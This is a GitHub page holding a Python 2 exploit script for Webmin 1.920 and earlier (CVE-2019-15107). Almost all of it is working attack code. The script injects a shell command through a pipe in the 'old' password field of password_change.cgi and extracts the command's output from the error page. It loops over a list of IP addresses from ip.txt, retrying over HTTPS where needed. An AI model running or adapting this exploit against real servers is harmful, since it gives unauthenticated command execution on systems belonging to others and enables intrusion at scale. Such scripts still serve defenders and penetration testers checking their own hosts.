-
Notifications
You must be signed in to change notification settings - Fork 115
/
Copy pathWebmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py
82 lines (66 loc) · 3.17 KB
/
Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import requests
import warnings
warnings.filterwarnings("ignore")
def test_post_https(ip,command):
try:
url = 'https://' + ip + ':10000/password_change.cgi'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://' + ip + ':10000/session_login.cgi',
'Cookie': 'redirect=1; testing=1; sid=x',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '47'
}
payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
r = requests.post(url, data=payload, headers = headers, verify = False)
if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text :
print '[+]Vulnerable:%s'%ip
nPos1 = r.text.index('Failed to change password : The current password is incorrect')
nPos2 = r.text.index('</h3></center>')
print 'Result:'
print r.text[nPos1+61:nPos2]
else:
print '[!]NotVulnerable:%s'%ip
print r.text
except Exception as e:
print '[!]Error:%s'%e
def test_post_http(ip,command):
try:
url = 'http://' + ip + ':10000/password_change.cgi'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://' + ip + ':10000/session_login.cgi',
'Cookie': 'redirect=1; testing=1; sid=x',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '47'
}
payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
r = requests.post(url, data=payload, headers = headers)
if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text :
print '[+]Vulnerable:%s'%ip
nPos1 = r.text.index('Failed to change password : The current password is incorrect')
nPos2 = r.text.index('</h3></center>')
print 'Result:'
print r.text[nPos1+61:nPos2]
elif r.status_code ==200 and 'This web server is running in SSL mode.' in r.text :
print '[*]This web server is running in SSL mode.Try to use https'
test_post_https(ip,command)
else:
print '[!]NotVulnerable:%s'%ip
print r.text
except Exception as e:
print '[!]Error:%s'%e
if __name__ == '__main__':
file_object = open('ip.txt', 'r')
for line in file_object:
test_post_http(line.strip('\r\n'),'id')